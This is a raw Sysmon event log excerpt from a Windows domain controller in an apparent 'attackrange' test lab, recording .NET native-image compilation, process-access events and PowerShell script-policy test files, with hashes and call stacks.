10341000x800000000000000022938Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.996{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A275-60D3-5805-00000000CF01}2212C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022937Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:01.996{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A275-60D3-5805-00000000CF01}2212C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022936Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.980{4DB9351A-A275-60D3-5705-00000000CF01}6120NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\HXTZXTAA93\Microsoft.PowerShell.Cmdletization.OData.ni.dll.auxMD5=82CD108AF8C1916D9AC3C8D635E1B93E,SHA256=DD768DF45F578986B3A455762BE13A419A34527F4D7AE1EE71FB4DF03981FBA1,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000022935Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.980{4DB9351A-A275-60D3-5705-00000000CF01}6120NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\HXTZXTAA93\Microsoft.PowerShell.Cmdletization.OData.ni.dllMD5=FC62786AA1430A296343FB036ADC44FE,SHA256=B104E06B84819B4D0B9B0AC62F67A0BB9E812A0308D670A71D8B0FD9F58885A0,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022934Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.964{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A275-60D3-5705-00000000CF01}6120C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022933Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.949{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A275-60D3-5705-00000000CF01}6120C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022932Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:01.949{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A275-60D3-5705-00000000CF01}6120C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022931Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.949{4DB9351A-A275-60D3-5605-00000000CF01}6536NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\488O5QYZMU\Microsoft.PowerShell.Activities.ni.dll.auxMD5=0C44E7BF02991DAC521CB3744E1BD300,SHA256=D38C36EE9CBDFA89B022CBAEF4E6B5460CFF09E58B2D37B47AA6957B690EFD82,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000022930Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.949{4DB9351A-A275-60D3-5605-00000000CF01}6536NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\488O5QYZMU\Microsoft.PowerShell.Activities.ni.dllMD5=77FBD2A6B0A8AE078B2041B0A9D250A8,SHA256=4B0C8B12FF457322608C7B3F61D8B05655B53E3F360941C0B8F55505CD87F927,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022929Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.855{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A275-60D3-5605-00000000CF01}6536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022928Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.839{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A275-60D3-5605-00000000CF01}6536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022927Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:01.839{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A275-60D3-5605-00000000CF01}6536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022926Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.839{4DB9351A-A275-60D3-5505-00000000CF01}3252NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\PRPW8KKOFQ\Microsoft.NetworkController.SDNDiagnosticsTask.ni.dll.auxMD5=ADDFC3E5E529E1CB3951121F5A4F8320,SHA256=E09DA27662B601D35B61AF8654B613AAF0D3930B2B5DFD8358F8CF23EE1B7510,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000022925Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.839{4DB9351A-A275-60D3-5505-00000000CF01}3252NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\PRPW8KKOFQ\Microsoft.NetworkController.SDNDiagnosticsTask.ni.dllMD5=FCC8647DB33C1796BDF44D1220BCF249,SHA256=DF27D6B5FD90264002CD0634813B165B7E9F17A6C30BE0E7CA9176A02884E2E1,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022924Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.824{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A275-60D3-5505-00000000CF01}3252C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000022923Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.808{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=DFF73F6DF590400D0068E0A5060D53D0,SHA256=79F30A30614A80F6B64251A4D261FBA968E52CDD3BC2D6E38C9FDE3BB9A01C3E,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x800000000000000022922Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.808{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A275-60D3-5505-00000000CF01}3252C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022921Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.808{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A275-60D3-5505-00000000CF01}3252C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Micro
soft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022920Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.808{4DB9351A-A275-60D3-5405-00000000CF01}6720NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\FGBRPWYDOK\Microsoft.ManagementConsole.ni.dll.auxMD5=16036F843CF900E1F03B8B9A2EF47C0A,SHA256=41ACBD3EE4A0DF75F3C9B6C91A2FD0C9EEC20407853A7F83142517E16045D048,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022919Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.808{4DB9351A-A275-60D3-5405-00000000CF01}6720NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\FGBRPWYDOK\Microsoft.ManagementConsole.ni.dllMD5=F65B5D58B6FC8F93E3D02C7472AE16F1,SHA256=7250E85C13D83F497E59064031EC60E2E2863FABB41A1F614D6A190A1908AAC5,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022918Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.777{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A275-60D3-5405-00000000CF01}6720C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
23542300x800000000000000022866Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.136{4DB9351A-A275-60D3-4A05-00000000CF01}7024NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\J6IEYOL0BU\Microsoft.Internal.Tasks.Dataflow.ni.dllMD5=D5EEDBB2299A1F17FADF6E165B038806,SHA256=E231B80F2BED45320E83422AFF979D2812BA9D47459E33756531FEE9F62E3D83,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022865Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.136{4DB9351A-9DDB-60D3-0B00-00000000CF01}628832C:\Windows\system32\lsass.exe{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022864Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:01.136{4DB9351A-9DDB-60D3-0B00-00000000CF01}628832C:\Windows\system32\lsass.exe{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x800000000000000022863Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-CreatePipe2021-06-23 21:07:01.058{4DB9351A-A273-60D3-3C05-00000000CF01}6608\PSHost.132689560193562012.6608.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x800000000000000022862Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:01.043{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A275-60D3-4A05-00000000CF01}7024C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000022861Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.043{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_5ln4wdgy.koy.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022860Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.043{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_0de0gyld.bbm.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022859Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:01.027{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A275-60D3-4A05-00000000CF01}7024C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022858Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.027{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A275-60D3-4A05-00000000CF01}7024C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 
